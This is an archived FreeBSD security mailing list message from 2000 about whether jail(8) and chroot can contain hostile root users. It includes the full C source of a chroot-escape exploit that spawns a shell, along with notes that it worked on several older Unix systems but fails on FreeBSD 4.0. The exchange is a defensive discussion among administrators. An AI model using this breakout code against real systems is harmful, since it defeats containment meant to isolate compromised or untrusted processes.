Date: Fri, 12 May 2000 06:19:06 -0700 From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca> To: Poul-Henning Kamp <phk@critter.freebsd.dk> Cc: Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <200005121319.e4CDJev40777@cwsys.cwsent.com> In-Reply-To: Your message of "Fri, 12 May 2000 10:00:11 %2B0200." <4226.958118411@critter.freebsd.dk>
next in thread | previous in thread | raw e-mail | index | archive | help
In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp writes: > In message <Pine.BSF.4.21.0005110953510.8386-100000@anchovy.orem.iserver.com> > , > Paul Hart writes: > >On Thu, 11 May 2000, Adam Laurie wrote: > > > >> If someone backdoors your system with an authorized key, and is > >> confident they can gain root from a luser account, they don't need to > >> go any further, and it's extremely likely that the change will go > >> unnoticed *forever* > > > >But if you have hostile local users with root access, can you even trust > >the output from /etc/security? > > Yes, if you put them in a jail(8). I was about to comment that anyone with root can break out of any chrooted environment including jail, however testing the break out of jail exploit (good thing I tested before I spoke), which BTW worked on FreeBSD-3 and numerous other platforms including Linux, Solaris, and Tru64-UNIX, appears to no longer work under 4.0 -- which is a good thing! When did the FreeBSD chroot(2) get fixed? Once again FreeBSD leads the way. Following is the break-out-of-jail code. #include <unistd.h> #include <assert.h> const char *shell = "/bin/sh"; const char *lowerdir = "/tmp"; int main() { int i; assert(chdir("/") != -1); assert(chroot(lowerdir) != -1); for (i = 0; i < 32; i++) assert(chdir("..") != -1); assert(chroot(".") != -1); assert(execl(shell, shell, NULL) != -1); }; Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200005121319.e4CDJev40777>